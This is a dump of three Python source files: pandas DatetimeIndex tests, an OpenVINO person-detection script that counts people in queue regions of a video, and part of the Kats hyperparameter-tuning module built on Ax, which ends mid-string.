ex = DatetimeIndex(['2000-01-02', '2000-01-03'])
tm.assert_index_equal(result, ex)
def test_argmin_argmax(self):
idx = DatetimeIndex(['2000-01-04', '2000-01-01', '2000-01-02'])
assert idx.argmin() == 1
assert idx.argmax() == 0
def test_sort_values(self):
idx = DatetimeIndex(['2000-01-04', '2000-01-01', '2000-01-02'])
ordered = idx.sort_values()
assert ordered.is_monotonic
ordered = idx.sort_values(ascending=False)
assert ordered[::-1].is_monotonic
ordered, dexer = idx.sort_values(return_indexer=True)
assert ordered.is_monotonic
tm.assert_numpy_array_equal(dexer, np.array([1, 2, 0], dtype=np.intp))
ordered, dexer = idx.sort_values(return_indexer=True, ascending=False)
assert ordered[::-1].is_monotonic
tm.assert_numpy_array_equal(dexer, np.array([0, 2, 1], dtype=np.intp))
def test_map_bug_1677(self):
index = DatetimeIndex(['2012-04-25 09:30:00.393000'])
f = index.asof
result = index.map(f)
expected = Index([f(index[0])])
tm.assert_index_equal(result, expected)
def test_groupby_function_tuple_1677(self):
df = DataFrame(np.random.rand(100),
index=date_range("1/1/2000", periods=100))
monthly_group = df.groupby(lambda x: (x.year, x.month))
result = monthly_group.mean()
assert isinstance(result.index[0], tuple)
def test_append_numpy_bug_1681(self):
# another datetime64 bug
dr = date_range('2011/1/1', '2012/1/1', freq='W-FRI')
a = DataFrame()
c = DataFrame({'A': 'foo', 'B': dr}, index=dr)
result = a.append(c)
assert (result['B'] == dr).all()
def test_isin(self):
index = tm.makeDateIndex(4)
result = index.isin(index)
assert result.all()
result = index.isin(list(index))
assert result.all()
assert_almost_equal(index.isin([index[2], 5]),
np.array([False, False, True, False]))
def test_does_not_convert_mixed_integer(self):
df = tm.makeCustomDataframe(10, 10,
data_gen_f=lambda *args, **kwargs: randn(),
r_idx_type='i', c_idx_type='dt')
cols = df.columns.join(df.index, how='outer')
joined = cols.join(df.columns)
assert cols.dtype == np.dtype('O')
assert cols.dtype == joined.dtype
tm.assert_numpy_array_equal(cols.values, joined.values)
def test_join_self(self, join_type):
index = date_range('1/1/2000', periods=10)
joined = index.join(index, how=join_type)
assert index is joined
def assert_index_parameters(self, index):
assert index.freq == '40960N'
assert index.inferred_freq == '40960N'
def test_ns_index(self):
nsamples = 400
ns = int(1e9 / 24414)
dtstart = np.datetime64('2012-09-20T00:00:00')
dt = dtstart + np.arange(nsamples) * np.timedelta64(ns, 'ns')
freq = ns * offsets.Nano()
index = pd.DatetimeIndex(dt, freq=freq, name='time')
self.assert_index_parameters(index)
new_index = pd.DatetimeIndex(start=index[0], end=index[-1],
freq=index.freq)
self.assert_index_parameters(new_index)
def test_join_with_period_index(self, join_type):
df = tm.makeCustomDataframe(
10, 10, data_gen_f=lambda *args: np.random.randint(2),
c_idx_type='p', r_idx_type='dt')
s = df.iloc[:5, 0]
with tm.assert_raises_regex(ValueError,
'can only call with other '
'PeriodIndex-ed objects'):
df.columns.join(s.index, how=join_type)
def test_factorize(self):
idx1 = DatetimeIndex(['2014-01', '2014-01', '2014-02', '2014-02',
'2014-03', '2014-03'])
exp_arr = np.array([0, 0, 1, 1, 2, 2], dtype=np.intp)
exp_idx = DatetimeIndex(['2014-01', '2014-02', '2014-03'])
arr, idx = idx1.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
arr, idx = idx1.factorize(sort=True)
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
# tz must be preserved
idx1 = idx1.tz_localize('Asia/Tokyo')
exp_idx = exp_idx.tz_localize('Asia/Tokyo')
arr, idx = idx1.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
idx2 = pd.DatetimeIndex(['2014-03', '2014-03', '2014-02', '2014-01',
'2014-03', '2014-01'])
exp_arr = np.array([2, 2, 1, 0, 2, 0], dtype=np.intp)
exp_idx = DatetimeIndex(['2014-01', '2014-02', '2014-03'])
arr, idx = idx2.factorize(sort=True)
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
exp_arr = np.array([0, 0, 1, 2, 0, 2], dtype=np.intp)
exp_idx = DatetimeIndex(['2014-03', '2014-02', '2014-01'])
arr, idx = idx2.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, exp_idx)
# freq must be preserved
idx3 = date_range('2000-01', periods=4, freq='M', tz='Asia/Tokyo')
exp_arr = np.array([0, 1, 2, 3], dtype=np.intp)
arr, idx = idx3.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(idx, idx3)
def test_factorize_tz(self, tz_naive_fixture):
tz = tz_naive_fixture
# GH#13750
base = pd.date_range('2016-11-05', freq='H', periods=100, tz=tz)
idx = base.repeat(5)
exp_arr = np.arange(100, dtype=np.intp).repeat(5)
for obj in [idx, pd.Series(idx)]:
arr, res = obj.factorize()
tm.assert_numpy_array_equal(arr, exp_arr)
tm.assert_index_equal(res, base)
def test_factorize_dst(self):
# GH 13750
idx = pd.date_range('2016-11-06', freq='H', periods=12,
tz='US/Eastern')
for obj in [idx, pd.Series(idx)]:
arr, res = obj.factorize()
tm.assert_numpy_array_equal(arr, np.arange(12, dtype=np.intp))
tm.assert_index_equal(res, idx)
idx = pd.date_range('2016-06-13', freq='H', periods=12,
tz='US/Eastern')
for obj in [idx, pd.Series(idx)]:
arr, res = obj.factorize()
tm.assert_numpy_array_equal(arr, np.arange(12, dtype=np.intp))
tm.assert_index_equal(res, idx)
@pytest.mark.parametrize('arr, expected', [
(pd.DatetimeIndex(['2017', '2017']), pd.DatetimeIndex(['2017'])),
(pd.DatetimeIndex(['2017', '2017'], tz='US/Eastern'),
pd.DatetimeIndex(['2017'], tz='US/Eastern')),
])
def test_unique(self, arr, expected):
result = arr.unique()
tm.assert_index_equal(result, expected)
|
py
|
1a5f12259d2460a7e655adc74d767538fe95d3f6
|
import numpy as np
import time
from openvino.inference_engine import IENetwork, IECore
import os
import cv2
import argparse
import sys
class Queue:
'''
Class for dealing with queues
'''
def __init__(self):
self.queues=[]
def add_queue(self, points):
self.queues.append(points)
def get_queues(self, image):
for q in self.queues:
x_min, y_min, x_max, y_max=q
frame=image[y_min:y_max, x_min:x_max]
yield frame
def check_coords(self, coords, frame):
d={k+1:0 for k in range(len(self.queues))}
for coord in coords:
for i, q in enumerate(self.queues):
if coord[0]>q[0] and coord[2]<q[2]:
d[i+1]+=1
#cv2.rectangle(frame, (coord[0], coord[1]), (coord[2], coord[3]), (0, 55, 255), 4)
return d, frame
class PersonDetect:
'''
Class for the Person Detection Model.
'''
def __init__(self, model_name, device, threshold=0.60):
self.model_weights=model_name+'.bin'
self.model_structure=model_name+'.xml'
self.device=device
self.threshold=threshold
self.initial_w = ''
self.initial_h = ''
try:
self.model=IENetwork(self.model_structure, self.model_weights)
except Exception as e:
raise ValueError("Could not Initialise the network. Have you enterred the correct model path?")
self.input_name=next(iter(self.model.inputs))
self.input_shape=self.model.inputs[self.input_name].shape
self.output_name=next(iter(self.model.outputs))
self.output_shape=self.model.outputs[self.output_name].shape
def load_model(self):
self.core = IECore()
self.net = self.core.load_network(network=self.model, device_name=self.device, num_requests=1)
def predict(self, image):
input_img = self.preprocess_input(image)
input_dict = {self.input_name:input_img}
self.net.start_async(request_id=0,inputs=input_dict)
status = self.net.requests[0].wait(-1)
if status == 0:
results = self.net.requests[0].outputs[self.output_name]
image,coords = self.draw_outputs(results, image)
return coords,image
def draw_outputs(self, results, frame):
lst=[]
for obj in results[0][0]:
# Draw a bounding box for the object when its probability is more than the specified threshold
if obj[2] > self.threshold:
xmin = int(obj[3] * self.initial_w)
ymin = int(obj[4] * self.initial_h)
xmax = int(obj[5] * self.initial_w)
ymax = int(obj[6] * self.initial_h)
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), (0, 55, 255), 4)
c = [xmin,ymin,xmax,ymax]
lst.append(c)
return frame,lst
def preprocess_input(self, image):
n, c, h, w = self.input_shape
image = cv2.resize(image, (w, h))
image = image.transpose((2, 0, 1))
image = image.reshape((n, c, h, w))
return image
def main(args):
model=args.model
device=args.device
video_file=args.video
max_people=args.max_people
threshold=args.threshold
output_path=args.output_path
start_model_load_time=time.time()
pd= PersonDetect(model, device, threshold)
pd.load_model()
total_model_load_time = time.time() - start_model_load_time
queue=Queue()
try:
queue_param=np.load(args.queue_param)
for q in queue_param:
queue.add_queue(q)
except Exception as e:
print("error loading queue param file: ", e)
try:
cap=cv2.VideoCapture(video_file)
except FileNotFoundError:
print("Cannot locate video file: "+ video_file)
except Exception as e:
print("Something else went wrong with the video file: ", e)
pd.initial_w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
pd.initial_h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
video_len = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
fps = int(cap.get(cv2.CAP_PROP_FPS))
out_video = cv2.VideoWriter(os.path.join(output_path, 'output_video.mp4'), cv2.VideoWriter_fourcc(*'avc1'), fps, (pd.initial_w, pd.initial_h), True)
counter=0
start_inference_time=time.time()
try:
while cap.isOpened():
ret, frame=cap.read()
if not ret:
break
counter+=1
coords, image= pd.predict(frame)
num_people, image= queue.check_coords(coords,image)
print(f"Total People in frame = {len(coords)}")
print(f"Number of people in queue = {num_people}")
out_text=""
y_pixel=45
#cv2.putText(image, f"Total People in frame = {len(coords)}", (15, y_pixel), cv2.FONT_HERSHEY_COMPLEX, 2, (0, 255, 0), 2)
for k, v in num_people.items():
out_text += f"No. of People in Queue {k} is {v} "
if v >= int(max_people):
out_text += f" Queue full; Please move to next Queue "
cv2.putText(image, out_text, (15, y_pixel), cv2.FONT_HERSHEY_COMPLEX, 1, (0, 255, 0), 2)
out_text=""
y_pixel+=40
out_video.write(image)
total_time=time.time()-start_inference_time
total_inference_time=round(total_time, 1)
fps=counter/total_inference_time
with open(os.path.join(output_path, 'stats.txt'), 'w') as f:
f.write(str(total_inference_time)+'\n')
f.write(str(fps)+'\n')
f.write(str(total_model_load_time)+'\n')
cap.release()
cv2.destroyAllWindows()
except Exception as e:
print("Could not run Inference: ", e)
if __name__=='__main__':
parser=argparse.ArgumentParser()
parser.add_argument('--model', required=True)
parser.add_argument('--device', default='CPU')
parser.add_argument('--video', default=None)
parser.add_argument('--queue_param', default=None)
parser.add_argument('--output_path', default='/results')
parser.add_argument('--max_people', default=2)
parser.add_argument('--threshold', default=0.60)
args=parser.parse_args()
main(args)
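# Illustrative invocation sketch (all paths below are placeholders, not real files):
#
#     python person_detect.py \
#         --model /path/to/person-detection-model \
#         --device CPU \
#         --video /path/to/queue_video.mp4 \
#         --queue_param /path/to/queue_param.npy \
#         --output_path results/ \
#         --max_people 2 \
#         --threshold 0.6
#
# --model expects the IR file prefix without extension (the .xml/.bin suffixes are
# appended in PersonDetect.__init__), and --queue_param must point to a .npy file
# with one [x_min, y_min, x_max, y_max] row per queue.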
|
py
|
1a5f12a6e5b1387342b5fad810d1a8c9581498e1
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
""" Module that has parameter tuning classes for time series models.
This module has a collection of classes. A subset of these classes are parameter tuning
strategies with their abstract parent class. In addition, there are helper classes,
such as a factory that creates search strategy objects.
Typical usage example:
>>> import time_series_parameter_tuning as tspt
>>> a_search_strategy = tspt.SearchMethodFactory.create_search_method(...)
"""
import logging
import math
import time
import uuid
from abc import ABC, abstractmethod
from functools import reduce
from multiprocessing.pool import Pool
from numbers import Number
from typing import Any, Callable, Dict, List, Optional, Union
import pandas as pd
from ax import Arm, ComparisonOp, Data, OptimizationConfig, SearchSpace
from ax.core.experiment import Experiment
from ax.core.generator_run import GeneratorRun
from ax.core.metric import Metric
from ax.core.objective import Objective
from ax.core.outcome_constraint import OutcomeConstraint
from ax.modelbridge.discrete import DiscreteModelBridge
from ax.modelbridge.registry import Models
from ax.runners.synthetic import SyntheticRunner
from kats.consts import SearchMethodEnum
from ax.service.utils.instantiation import InstantiationBase
# Maximum number of worker processes used to evaluate trial arms in parallel
MAX_NUM_PROCESSES = 50
def compute_search_cardinality(params_space: List[Dict[str, Any]]) -> float:
"""compute cardinality of search space params"""
# check if search space is infinite
is_infinite = any([param["type"] == "range" for param in params_space])
if is_infinite:
return math.inf
else:
return math.prod([len(param["values"]) for param in params_space])
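# Worked example of the rule above: two "choice" parameters with 3 and 4 candidate
# values give a finite search space of 3 * 4 = 12 arms, while the presence of any
# "range" parameter makes the cardinality math.inf.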
class Final(type):
"""A helper class to ensure a class cannot be inherited.
It is used as:
class Foo(metaclass=Final):
...
Once the class, Foo, is declared in this way, no other class can
inherit it. See the declaration of SearchMethodFactory class below.
Attributes:
N/A
"""
# pyre-fixme[3]: Return type must be annotated.
# pyre-fixme[2]: Parameter must be annotated.
def __new__(metacls, name, bases, classdict):
"""Checks if child class is instantiated. Throws an error if so.
Args:
metacls: To be used by metaclass argument of a new class instantiation
name: Same as above
bases: Same as above
classdict: Same as above
Returns:
Type of the new class
Raises:
TypeError:
Raised when an object of a class using this Final
class as metaclass is created.
"""
for b in bases:
if isinstance(b, Final):
raise TypeError(
"type '{0}' is not an acceptable base type".format(b.__name__)
)
return type.__new__(metacls, name, bases, dict(classdict))
class TimeSeriesEvaluationMetric(Metric):
"""Object to evaluate an arm
An object of this class is used to evaluate an arm through search. It is mainly
used to parallelize the search, as evaluation of an arm needs to be run in
parallel. Obviously, this is possible if the search strategy allows it in
theory.
Attributes:
evaluation_function: The name of the function to be used in evaluation.
logger: the logger object to log.
multiprocessing: Flag to decide whether evaluation will run in parallel.
"""
def __init__(
self,
name: str,
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
evaluation_function: Callable,
logger: logging.Logger,
multiprocessing: bool = False,
) -> None:
super().__init__(name)
self.evaluation_function = evaluation_function
self.logger = logger
self.multiprocessing = multiprocessing
@classmethod
def is_available_while_running(cls) -> bool:
"""Metrics are available while the trial is `RUNNING` and should
always be re-fetched.
"""
return True
# pyre-fixme[2]: Parameter must be annotated.
# pyre-fixme[24]: Generic type `dict` expects 2 type parameters, use
# `typing.Dict` to avoid runtime subscripting errors.
def evaluate_arm(self, arm) -> Dict:
"""Evaluates the performance of an arm.
Takes an arm object, gets its parameter values, runs
evaluation_function and returns what that function returns
after reformatting it.
Args:
arm: The arm object to be evaluated.
Returns:
Either a dict or a list of dict. These dict objects need
to have metric name that describes the metric, arm_name,
mean which is the mean of the evaluation value and its
standard error.
"""
# Arm evaluation requires mean and standard error or dict for multiple metrics
evaluation_result = self.evaluation_function(arm.parameters)
if isinstance(evaluation_result, dict):
return [
{
"metric_name": name,
"arm_name": arm.name,
"mean": value[0],
"sem": value[1],
}
for (name, value) in evaluation_result.items()
]
elif isinstance(evaluation_result, Number):
evaluation_result = (evaluation_result, 0.0)
elif (
isinstance(evaluation_result, tuple)
and len(evaluation_result) == 2
and all(isinstance(n, Number) for n in evaluation_result)
):
pass
else:
raise TypeError(
"Evaluation function should either return a single numeric "
"value that represents the error or a tuple of two numeric "
"values, one for the mean of error and the other for the "
"standard error of the mean of the error."
)
return {
"metric_name": self.name,
"arm_name": arm.name,
"mean": evaluation_result[0],
"sem": evaluation_result[1],
}
# pyre-fixme[14]: `fetch_trial_data` overrides method defined in `Metric`
# inconsistently.
# pyre-fixme[2]: Parameter must be annotated.
def fetch_trial_data(self, trial) -> Data:
"""Calls evaluation of every arm in a trial.
Args:
trial: The trial of which all arms to be evaluated.
Returns:
Data object that has arm names, trial index, evaluation.
"""
if self.multiprocessing:
with Pool(processes=min(len(trial.arms), MAX_NUM_PROCESSES)) as pool:
records = pool.map(self.evaluate_arm, trial.arms)
pool.close()
else:
records = list(map(self.evaluate_arm, trial.arms))
if isinstance(records[0], list):
# Evaluation result output contains multiple metrics
records = [metric for record in records for metric in record]
for record in records:
record.update({"trial_index": trial.index})
return Data(df=pd.DataFrame.from_records(records))
class TimeSeriesParameterTuning(ABC):
"""Abstract class for search strategy class, such as GridSearch, RandomSearch.
Defines and imposes a structure to search strategy classes. Each search
strategy has to have attributes listed below. Also, it provides methods
that are common to search strategies.
Attributes:
parameters: List of dictionaries where each dict represents a hyperparameter.
experiment_name: An arbitrary name for the experiment object.
objective_name: An arbitrary name for the objective function that is used
in the evaluation function.
outcome_constraints: Constraints set on the outcome of the objective.
"""
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
evaluation_function: Optional[Callable] = None
outcome_constraints: Optional[List[OutcomeConstraint]] = None
def __init__(
self,
parameters: Optional[List[Dict[str, Any]]] = None,
experiment_name: Optional[str] = None,
objective_name: Optional[str] = None,
outcome_constraints: Optional[List[str]] = None,
multiprocessing: bool = False,
) -> None:
if parameters is None:
parameters = [{}]
# pyre-fixme[4]: Attribute must be annotated.
self.logger = logging.getLogger(__name__)
self.logger.info(
"Parameter tuning search space dimensions: {}".format(parameters)
)
self.validate_parameters_format(parameters)
# pyre-fixme[4]: Attribute must be annotated.
self.parameters = [InstantiationBase.parameter_from_json(parameter) for parameter in parameters]
self.outcome_constraints = (
[
InstantiationBase.outcome_constraint_from_str(str_constraint)
for str_constraint in outcome_constraints
]
if outcome_constraints is not None
else None
)
self._kats_search_space = SearchSpace(parameters=self.parameters)
self.logger.info("Search space is created.")
# pyre-fixme[4]: Attribute must be annotated.
self.job_id = uuid.uuid4()
# pyre-fixme[4]: Attribute must be annotated.
self.experiment_name = (
experiment_name if experiment_name else f"parameter_tuning_{self.job_id}"
)
# pyre-fixme[4]: Attribute must be annotated.
self.objective_name = (
objective_name if objective_name else f"objective_{self.job_id}"
)
self.multiprocessing = multiprocessing
self._exp = Experiment(
name=self.experiment_name,
search_space=self._kats_search_space,
runner=SyntheticRunner(),
)
self._trial_data = Data()
self.logger.info("Experiment is created.")
@staticmethod
# pyre-fixme[24]: Generic type `list` expects 1 type parameter, use
# `typing.List` to avoid runtime subscripting errors.
def validate_parameters_format(parameters: List) -> None:
"""Check parameters objects structure.
parameters object needs to be in a specific format. It needs to be
a list of dict where each dict associates a parameter. Raises an
error depending on the format violation.
Args:
parameters: parameters of which format is to be audited.
Returns:
None, if none of the checks fail, raises error if any fails.
Raises:
TypeError: If parameters is not of type list.
ValueError: Parameters cannot be empty as there should be at least
one hyperparameter to tune.
TypeError: If any of the list element is of type other then dict
"""
if not isinstance(parameters, list):
raise TypeError(
"The input parameter, parameters, should be a list even if a "
"single parameter is defined."
)
if len(parameters) == 0:
raise ValueError(
"The parameter list is empty. No search space can be created "
"if not parameter is specified."
)
for i, parameter_dict in enumerate(parameters):
if not isinstance(parameter_dict, dict):
raise TypeError(
"The parameter_dict, {i}, in the list of parameters should"
" be a dict. The parameter_dict is {parameter_dict}, and"
" its type is {type_}.".format(
i=i,
parameter_dict=str(parameter_dict),
type_=type(parameter_dict),
)
)
if len(parameter_dict) == 0:
raise ValueError(
"A parameter_dict in the parameter list is empty. All "
"parameter_dict items should have valid key: value entries"
"."
)
def get_search_space(self) -> SearchSpace:
"""Getter of search space attribute of the private attribute, _exp."""
return self._exp.search_space
def generator_run_for_search_method(
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
self, evaluation_function: Callable, generator_run: DiscreteModelBridge
) -> None:
"""Creates a new batch trial then runs the lastest.
Args:
evaluation_function: The name of the function to use for arm evaluation
generator_run: Generator_run object that is used to populate new arms
"""
self.evaluation_function = evaluation_function
outcome_constraints = self.outcome_constraints
if outcome_constraints:
# Convert dummy base Metrics to TimeseriesEvaluationMetrics
self.outcome_constraints = [
OutcomeConstraint(
TimeSeriesEvaluationMetric(
name=oc.metric.name,
evaluation_function=evaluation_function,
logger=self.logger,
multiprocessing=self.multiprocessing,
),
op=oc.op,
bound=oc.bound,
relative=oc.relative,
)
for oc in outcome_constraints
]
self._exp.optimization_config = OptimizationConfig(
objective=Objective(
metric=TimeSeriesEvaluationMetric(
name=self.objective_name,
evaluation_function=self.evaluation_function,
logger=self.logger,
multiprocessing=self.multiprocessing,
),
minimize=True,
),
outcome_constraints=self.outcome_constraints,
)
# pyre-fixme[6]: Expected `Optional[GeneratorRun]` for 1st param but got
# `DiscreteModelBridge`.
self._exp.new_batch_trial(generator_run=generator_run)
# We run the most recent batch trial as we only run candidate trials
self._exp.trials[max(self._exp.trials)].run()
self._trial_data = Data.from_multiple_data(
[
self._trial_data,
self._exp.fetch_trials_data(trial_indices=[max(self._exp.trials)]),
]
)
@abstractmethod
def generate_evaluate_new_parameter_values(
self,
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
evaluation_function: Callable,
arm_count: int = -1 # -1 means
# create all arms (i.e. all combinations of parameter values)
) -> None:
"""A place holder method for users that are still using it.
It previously ran evaluation for trials. That part was moved to
generator_run_for_search_methods(). Now this method does nothing.
"""
pass
@staticmethod
def _repivot_dataframe(armscore_df: pd.DataFrame) -> pd.DataFrame:
"""Reformats the score data frame.
Args:
armscore_df: Pandas DataFrame object that has the arm scores
in raw format.
Returns:
Pandas DataFrame object of arm score in the new format
"""
transform = (
armscore_df.set_index(["trial_index", "arm_name", "metric_name"])
.unstack("metric_name")
.reset_index()
)
new_cols = transform.columns.to_flat_index()
parameters_holder = transform[
list(filter(lambda x: "parameters" in x, new_cols))[0]
]
transform.drop(columns="parameters", level=0, inplace=True)
new_cols = new_cols.drop(labels=filter(lambda x: "parameters" in x, new_cols))
transform.columns = ["trial_index", "arm_name"] + [
"_".join(tpl) for tpl in new_cols[2:]
]
transform["parameters"] = parameters_holder
# pyre-fixme[7]: Expected `DataFrame` but got `Union[DataFrame, Series]`.
return transform
def list_parameter_value_scores(
self, legit_arms_only: bool = False
) -> pd.DataFrame:
"""Creates a Pandas DataFrame from evaluated arms then returns it.
The method should be called to fetch evaluation results of arms that
are populated and evaluated so far.
Args:
legit_arms_only: A flag to filter out arms that violate outcome_constraints,
if any are given.
Returns:
A Pandas DataFrame that holds arms populated and evaluated so far.
"""
# For experiments which have not ran generate_evaluate_new_parameter_values,
# we cannot provide trial data without metrics, so we return empty dataframe
if not self._exp.metrics:
return pd.DataFrame(
[],
columns=[
"arm_name",
"metric_name",
"mean",
"sem",
"parameters",
"trial_index",
],
)
armscore_df = self._trial_data.df.copy()
armscore_df["parameters"] = armscore_df["arm_name"].map(
{k: v.parameters for k, v in self._exp.arms_by_name.items()}
)
if self.outcome_constraints:
# Deduplicate entries for which there are outcome constraints
armscore_df = armscore_df.loc[
# pyre-ignore[16]: `None` has no attribute `index`.
armscore_df.astype(str)
.drop_duplicates()
.index
]
if legit_arms_only:
def filter_violating_arms(
arms: List[Arm], data: Data, optimization_config: OptimizationConfig
) -> List[Arm]:
boolean_indices = []
for oc in optimization_config.outcome_constraints:
if oc.op is ComparisonOp.LEQ:
boolean_indices.append(
data.df[data.df.metric_name == oc.metric.name]["mean"]
<= oc.bound
)
else:
boolean_indices.append(
data.df[data.df.metric_name == oc.metric.name]["mean"]
>= oc.bound
)
eligible_arm_indices = reduce(lambda x, y: x & y, boolean_indices)
eligible_arm_names = data.df.loc[eligible_arm_indices.index][
eligible_arm_indices
].arm_name
return list(
filter(lambda x: x.name in eligible_arm_names.values, arms)
)
filtered_arms = filter_violating_arms(
list(self._exp.arms_by_name.values()),
self._exp.fetch_data(),
# pyre-fixme[6]: Expected `OptimizationConfig` for 3rd param but
# got `Optional[ax.core.optimization_config.OptimizationConfig]`.
self._exp.optimization_config,
)
armscore_df = armscore_df[
armscore_df["arm_name"].isin([arm.name for arm in filtered_arms])
]
armscore_df = self._repivot_dataframe(armscore_df)
return armscore_df
class SearchMethodFactory(metaclass=Final):
"""Generates and returns search strategy object."""
def __init__(self) -> None:
raise TypeError(
"SearchMethodFactory is not allowed to be instantiated. Use "
"it as a static class."
)
@staticmethod
def create_search_method(
parameters: List[Dict[str, Any]],
selected_search_method: SearchMethodEnum = SearchMethodEnum.GRID_SEARCH,
experiment_name: Optional[str] = None,
objective_name: Optional[str] = None,
outcome_constraints: Optional[List[str]] = None,
seed: Optional[int] = None,
bootstrap_size: int = 5,
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
evaluation_function: Optional[Callable] = None,
bootstrap_arms_for_bayes_opt: Optional[List[Dict[str, Any]]] = None,
multiprocessing: bool = False,
) -> TimeSeriesParameterTuning:
"""The static method of factory class that creates the search method
object. It does not require the class to be instantiated.
Args:
parameters: List[Dict] = None,
Defines parameters by their names, their types, and their optional
values for custom parameter search space.
selected_search_method: SearchMethodEnum = SearchMethodEnum.GRID_SEARCH
Defines search method to be used during parameter tuning. It has to
be an option from the enum, SearchMethodEnum.
experiment_name: str = None,
Name of the experiment to be used in Ax's experiment object.
objective_name: str = None,
Name of the objective to be used in Ax's experiment evaluation.
outcome_constraints: List[str] = None
List of constraints defined as strings. Example: ['metric1 >= 0',
'metric2 < 5']
bootstrap_arms_for_bayes_opt: List[dict] = None
List of params. It provides a list of self-defined inital parameter
values for Baysian Optimal search. Example: for Holt Winter's model,
[{'m': 7}, {'m': 14}]
Returns:
A search object, GridSearch, RandomSearch, or BayesianOptSearch,
depending on the selection.
Raises:
NotImplementedError: Raised if the selection is not among strategies
that are implemented.
"""
if selected_search_method == SearchMethodEnum.GRID_SEARCH:
return GridSearch(
parameters=parameters,
experiment_name=experiment_name,
objective_name=objective_name,
outcome_constraints=outcome_constraints,
multiprocessing=multiprocessing,
)
elif (
selected_search_method == SearchMethodEnum.RANDOM_SEARCH_UNIFORM
or selected_search_method == SearchMethodEnum.RANDOM_SEARCH_SOBOL
):
return RandomSearch(
parameters=parameters,
experiment_name=experiment_name,
objective_name=objective_name,
random_strategy=selected_search_method,
outcome_constraints=outcome_constraints,
seed=seed,
multiprocessing=multiprocessing,
)
elif selected_search_method == SearchMethodEnum.BAYES_OPT:
assert (
evaluation_function is not None
), "evaluation_function cannot be None. It is needed at initialization of BayesianOptSearch object."
return BayesianOptSearch(
parameters=parameters,
evaluation_function=evaluation_function,
experiment_name=experiment_name,
objective_name=objective_name,
bootstrap_size=bootstrap_size,
seed=seed,
bootstrap_arms_for_bayes_opt=bootstrap_arms_for_bayes_opt,
outcome_constraints=outcome_constraints,
multiprocessing=multiprocessing,
)
else:
raise NotImplementedError(
"A search method yet to implement is selected. Only grid"
" search and random search are implemented."
)
class GridSearch(TimeSeriesParameterTuning):
"""The method factory class that creates the search method object. It does
not require the class to be instantiated.
Do not instantiate this class using its constructor.
Rather use the factory, SearchMethodFactory.
Attributes:
parameters: List[Dict] = None,
Defines parameters by their names, their types, and their optional
values for custom parameter search space.
experiment_name: str = None,
Name of the experiment to be used in Ax's experiment object.
objective_name: str = None,
Name of the objective to be used in Ax's experiment evaluation.
outcome_constraints: List[str] = None
List of constraints defined as strings. Example: ['metric1 >= 0',
'metric2 < 5']
"""
def __init__(
self,
parameters: List[Dict[str, Any]],
experiment_name: Optional[str] = None,
objective_name: Optional[str] = None,
outcome_constraints: Optional[List[str]] = None,
multiprocessing: bool = False,
# pyre-fixme[2]: Parameter must be annotated.
**kwargs,
) -> None:
super().__init__(
parameters,
experiment_name,
objective_name,
outcome_constraints,
multiprocessing,
)
# pyre-fixme[4]: Attribute must be annotated.
self._factorial = Models.FACTORIAL(
search_space=self.get_search_space(), check_cardinality=False
)
self.logger.info("A factorial model for arm generation is created.")
self.logger.info("A GridSearch object is successfully created.")
def generate_evaluate_new_parameter_values(
self,
# pyre-fixme[24]: Generic type `Callable` expects 2 type parameters.
evaluation_function: Callable,
arm_count: int = -1, # -1 means create all arms (i.e. all combinations of
# parameter values)
) -> None:
"""This method can only be called once. arm_count other than -1 will be ignored
as this search strategy exhaustively explores all arms.
"""
if arm_count != -1:
# FullFactorialGenerator ignores specified arm_count as it automatically determines how many arms
self.logger.info(
"GridSearch arm_count input is ignored and automatically determined by generator."
)
arm_count = -1
factorial_run = self._factorial.gen(n=arm_count)
self.generator_run_for_search_method(
evaluation_function=evaluation_function, generator_run=factorial_run
)
class RandomSearch(TimeSeriesParameterTuning):
"""Random search for hyperparameter tuning.
Do not instantiate this class using its constructor.
Rather use the factory, SearchMethodFactory.
Attributes:
parameters: List[Dict],
Defines parameters by their names, their types, and their optional
values for custom parameter search space.
experiment_name: str = None,
Name of the experiment to be used in Ax's experiment object.
objective_name: str = None,
Name of the objective to be used in Ax's experiment evaluation.
seed: int = None,
Seed for Ax quasi-random model. If None, then time.time() is set.
random_strategy: SearchMethodEnum = SearchMethodEnum.RANDOM_SEARCH_UNIFORM,
By now, we already know that the search method is random search.
However, there are optional random strategies: UNIFORM, or SOBOL.
This parameter selects between them.
outcome_constraints: List[str] = None
List of constraints defined as strings. Example: ['metric1 >= 0',
'metric2 < 5']
"""
def __init__(
self,
parameters: List[Dict[str, Any]],
experiment_name: Optional[str] = None,
objective_name: Optional[str] = None,
seed: Optional[int] = None,
random_strategy: SearchMethodEnum = SearchMethodEnum.RANDOM_SEARCH_UNIFORM,
outcome_constraints: Optional[List[str]] = None,
multiprocessing: bool = False,
# pyre-fixme[2]: Parameter must be annotated.
**kwargs,
) -> None:
super().__init__(
parameters,
experiment_name,
objective_name,
outcome_constraints,
multiprocessing,
)
if seed is None:
seed = int(time.time())
self.logger.info(
"No seed is given by the user, it will be set by the current time"
)
self.logger.info("Seed that is used in random search: {seed}".format(seed=seed))
if random_strategy == SearchMethodEnum.RANDOM_SEARCH_UNIFORM:
# pyre-fixme[4]: Attribute must be annotated.
self._random_strategy_model = Models.UNIFORM(
search_space=self.get_search_space(), deduplicate=True, seed=seed
)
elif random_strategy == SearchMethodEnum.RANDOM_SEARCH_SOBOL:
self._random_strategy_model = Models.SOBOL(
search_space=self.get_search_space(), deduplicate=True, seed=seed
)
else:
raise NotImplementedError(
"Invalid random strategy selection. It should be either "
